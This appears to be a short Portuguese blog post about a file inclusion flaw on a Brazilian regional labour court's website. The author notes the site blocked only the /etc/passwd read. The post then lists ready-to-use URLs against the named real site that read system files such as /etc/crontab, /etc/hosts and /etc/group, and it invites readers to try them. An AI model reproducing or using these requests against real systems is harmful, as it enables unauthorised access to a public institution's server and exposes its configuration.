Pequena falha de segurança

Ontem, o Vinicius Daniel me passou um link com uma "pequena falha de segurança", no site do TRT - 10ª região.

Se você entrasse no endereço abaixo você via o arquivo passwd completo:

http://www.trt10.jus.br/index.php?mod=/etc/passwd

Segundo o Vinicius, já os alertou, mas nem deram atenção.

Para minha surpresa, hoje quando fui publicar não estava mais "funcionando"... Porém, resolveram com uma solução, no mínimo, curiosa...

Testem os links abaixo:

http://www.trt10.jus.br/index.php?mod=/etc/fstab

http://www.trt10.jus.br/index.php?mod=/proc/cpuinfo

http://www.trt10.jus.br/index.php?mod=/proc/version

http://www.trt10.jus.br/index.php?mod=/etc/crontab

http://www.trt10.jus.br/index.php?mod=/etc/hosts

http://www.trt10.jus.br/index.php?mod=/etc/group

No momento da publicação deste post estão todos funcionando... Só tiraram a leitura do passwd...

(@SobrinhuREAL atacando...)

 

↑ Voltar ao Topo